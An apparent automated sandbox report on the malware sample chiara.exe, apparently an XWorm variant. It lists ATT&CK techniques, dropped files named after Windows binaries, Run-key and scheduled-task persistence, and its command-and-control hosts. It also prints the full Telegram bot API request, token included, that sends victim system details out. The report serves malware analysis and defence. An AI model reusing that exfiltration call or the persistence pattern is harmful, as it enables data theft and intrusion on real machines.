Email Addresses	DNS Server	Domain Accounts	At	1 Windows Service	1 Valid Accounts	21 Obfuscated Files or Information	Security Account Manager	46 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	1 Access Token Manipulation	32 Software Packing	NTDS	31 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	21 Registry Run Keys / Startup Folder	1 Windows Service	1 DLL Side-Loading	LSA Secrets	51 Virtualization/Sandbox Evasion	SSH	Keylogging	214 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	511 Process Injection	1 File Deletion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	231 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	21 Registry Run Keys / Startup Folder	1 Valid Accounts	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	51 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	511 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
chiara.exe	100%	Avira	TR/Patched.Ren.Gen
chiara.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\Resources\Themes\icsys.icn.exe	100%	Avira	TR/Patched.Ren.Gen
C:\Windows\Resources\spoolsv.exe	100%	Avira	TR/Patched.Ren.Gen
C:\Windows\Resources\svchost.exe	100%	Avira	TR/Patched.Ren.Gen
C:\Windows\Resources\Themes\explorer.exe	100%	Avira	TR/Patched.Ren.Gen
C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	100%	Joe Sandbox ML
C:\Windows\Resources\Themes\icsys.icn.exe	100%	Joe Sandbox ML
C:\Windows\Resources\spoolsv.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\chiara.exe	100%	Joe Sandbox ML
C:\Windows\Resources\svchost.exe	100%	Joe Sandbox ML
C:\Windows\Resources\Themes\explorer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Windows Logon Application.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://contoso.com/License	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2.C:	0%	URL Reputation	safe
http://purl.oen	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://g.live.com/odclientsettings/Prod/C:	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
http://codecmd03.googlecode.com/files/tjcm.gifcx	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/files/tjcm.gifWR%	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/files/tjcm.gifc	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/files/tjcm.gifh	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/files/tjcm.giffh	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/files/tjcm.gifcP	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/files/tjcm.gifWR%	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/files/tjcm.gif.hU	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/files/tjcm.gif	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/files/tjcm.gifZR	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage?chat_id=5702314606&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3D2CFD5CADE17C3471CE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203A4PCO_8_%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20Crypt	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage?chat_id=57023	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/files/tjcm.gifQh	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/files/tjcm.gifMR	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/googlecode.com/	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/files/tjcm.gif%hR	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/files/tjcm.gifc	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/files/tjcm.gif	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/files/tjcm.gifdR(	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/files/tjcm.gifCh	0%	Avira URL Cloud	safe
https://api.telegram	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/googlecode.com/	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/files/tjcm.gif	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/rerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRI85	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/files/tjcm.gifc	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/Data	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/l	0%	Avira URL Cloud	safe
mariona.duckdns.org	100%	Avira URL Cloud	malware
http://codecmd02.googlecode.com/files/tjcm.gifqR?	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/files/tjcm.gifZR	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
http://crl.mi	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/files/tjcm.gifZh	0%	Avira URL Cloud	safe
http://go.mic1	0%	Avira URL Cloud	safe
http://crl.microi	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/files/tjcm.gifMR	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/s	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/on	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/files/tjcm.gifoh	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/32	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/files/tjcm.gifcXlXl	0%	Avira URL Cloud	safe
http://codecmd03.googlecode.com/	0%	Avira URL Cloud	safe
https://api.telegram.orgem	0%	Avira URL Cloud	safe
http://api.telegram.org	0%	Avira URL Cloud	safe
http://codecmd01.googlecode.com/files/tjcm.gifdR(	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/files/tjcm.gifcH	0%	Avira URL Cloud	safe
http://codecmd02.googlecode.com/files/tjcm.gif%Rk	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.telegram.org	149.154.167.220	true	true	unknown
googlecode.l.googleusercontent.com	66.102.1.82	true	false	unknown
mariona.duckdns.org	unknown	unknown	true	unknown
codecmd01.googlecode.com	unknown	unknown	true	unknown
codecmd03.googlecode.com	unknown	unknown	true	unknown
codecmd02.googlecode.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://codecmd02.googlecode.com/files/tjcm.gif	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage?chat_id=5702314606&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3D2CFD5CADE17C3471CE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203A4PCO_8_%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20Crypt	true	Avira URL Cloud: safe	unknown
http://codecmd03.googlecode.com/files/tjcm.gif	false	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/files/tjcm.gif	false	Avira URL Cloud: safe	unknown
mariona.duckdns.org	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://codecmd01.googlecode.com/files/tjcm.giffh	explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	InstallUtil.exe, 00000015.00000002.3271221275.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	shost.exe, 0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp, shost.exe, 0000000B.00000002.2538242356.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, shost.exe, 0000000B.00000002.2572034544.0000000004751000.00000004.00000800.00020000.00000000.sdmp, shost.exe, 0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2155637688.0000000000372000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3271221275.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/files/tjcm.gifh	explorer.exe, 00000004.00000002.3260042369.000000000068C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd03.googlecode.com/files/tjcm.gifcx	explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd02.googlecode.com/files/tjcm.gifWR%	explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd03.googlecode.com/files/tjcm.gifWR%	explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/files/tjcm.gifc	explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/files/tjcm.gifcP	explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 0000001F.00000002.2755903963.0000000008353000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000021.00000002.2829977511.0000000005E73000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://codecmd02.googlecode.com/files/tjcm.gifMR	explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage?chat_id=57023	InstallUtil.exe, 00000015.00000002.3271221275.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://codecmd02.googlecode.com/files/tjcm.gif.hU	explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000006.00000003.2024087486.0000013EB5000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	false	URL Reputation: safe	unknown
http://codecmd01.googlecode.com/files/tjcm.gifQh	explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/files/tjcm.gifZR	explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://purl.oen	shost.exe, 0000000B.00000002.2585528167.0000000006192000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://codecmd03.googlecode.com/files/tjcm.gif%hR	explorer.exe, 00000004.00000003.2819433944.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/	explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 0000001A.00000002.2577315144.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2634564647.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2704526015.0000000004891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2794900179.0000000004E11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000021.00000002.2829977511.0000000005E73000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000001A.00000002.2591269893.00000000058D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2655664001.0000000005B25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2733242381.00000000058F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2829977511.0000000005E73000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://codecmd02.googlecode.com/googlecode.com/	explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram	InstallUtil.exe, 00000015.00000002.3271221275.0000000002FB4000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	InstallUtil.exe, 00000015.00000002.3271221275.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2577315144.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2634564647.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2704526015.0000000004891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2794900179.0000000004E11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://codecmd02.googlecode.com/files/tjcm.gifdR(	explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/googlecode.com/	explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd02.googlecode.com/files/tjcm.gifc	explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000001A.00000002.2591269893.00000000058D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2655664001.0000000005B25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2733242381.00000000058F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2829977511.0000000005E73000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://codecmd01.googlecode.com/files/tjcm.gifCh	explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000021.00000002.2794900179.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000001A.00000002.2577315144.00000000049C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2634564647.0000000004C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2704526015.00000000049E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2794900179.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://codecmd02.googlecode.com/	explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000021.00000002.2794900179.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd03.googlecode.com/rerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRI85	explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/Data	explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd03.googlecode.com/files/tjcm.gifZR	explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/l	explorer.exe, 00000004.00000003.2819534174.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd03.googlecode.com/files/tjcm.gifc	explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000021.00000002.2829977511.0000000005E73000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://codecmd02.googlecode.com/files/tjcm.gifqR?	explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000006.00000002.3275754561.0000013EB4E90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000021.00000002.2794900179.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.mi	powershell.exe, 0000001A.00000002.2596840069.00000000071AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod/C:	edb.log.6.dr	false	URL Reputation: safe	unknown
http://codecmd03.googlecode.com/files/tjcm.gifZh	explorer.exe, 00000004.00000003.2819433944.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microi	powershell.exe, 00000021.00000002.2855023974.00000000087D2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/files/tjcm.gifMR	explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.mic1	Windows Logon Application.exe, 00000027.00000002.3006609742.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd03.googlecode.com/32	explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd03.googlecode.com/on	explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd03.googlecode.com/s	explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	powershell.exe, 0000001F.00000002.2700068287.0000000002D03000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://codecmd03.googlecode.com/files/tjcm.gifoh	explorer.exe, 00000004.00000003.2819433944.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001A.00000002.2577315144.00000000049C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2634564647.0000000004C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2704526015.00000000049E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2794900179.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://codecmd02.googlecode.com/files/tjcm.gifcXlXl	explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd03.googlecode.com/	explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2819534174.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.orgem	InstallUtil.exe, 00000015.00000002.3271221275.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd02.googlecode.com/files/tjcm.gif%Rk	explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd02.googlecode.com/files/tjcm.gifcH	explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://codecmd01.googlecode.com/files/tjcm.gifdR(	explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	InstallUtil.exe, 00000015.00000002.3271221275.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
74.125.133.82	unknown	United States	15169	GOOGLEUS	false
66.102.1.82	googlecode.l.googleusercontent.com	United States	15169	GOOGLEUS	false
74.125.71.82	unknown	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502918
Start date and time:	2024-09-02 14:23:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	chiara.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@54/44@6/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 98% Number of executed functions: 92 Number of non-executed functions: 120
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: chiara.exe

Simulations

Behavior and APIs

Time	Type	Description
08:23:54	API Interceptor	4394x Sleep call for process: svchost.exe modified
08:23:59	API Interceptor	1675x Sleep call for process: explorer.exe modified
08:24:37	API Interceptor	18x Sleep call for process: shost.exe modified
08:24:45	API Interceptor	5x Sleep call for process: InstallUtil.exe modified
08:24:47	API Interceptor	59x Sleep call for process: powershell.exe modified
08:24:51	API Interceptor	1x Sleep call for process: chiara.exe modified
14:24:02	Autostart	Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\resources\themes\explorer.exe RO
14:24:10	Autostart	Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\resources\svchost.exe RO
14:25:19	Task Scheduler	Run new task: Windows Logon Application path: C:\Users\user\AppData\Roaming\Windows s>Logon Application.exe
14:25:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Logon Application C:\Users\user\AppData\Roaming\Windows Logon Application.exe
14:25:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Logon Application C:\Users\user\AppData\Roaming\Windows Logon Application.exe
14:25:40	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Logon Application.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	RFQ September Order PR 29235 doc-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	RFQ.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Unmovablety.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Request for Quotation #P01042.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.29312.2664.exe	Get hash	malicious	AgentTesla	Browse
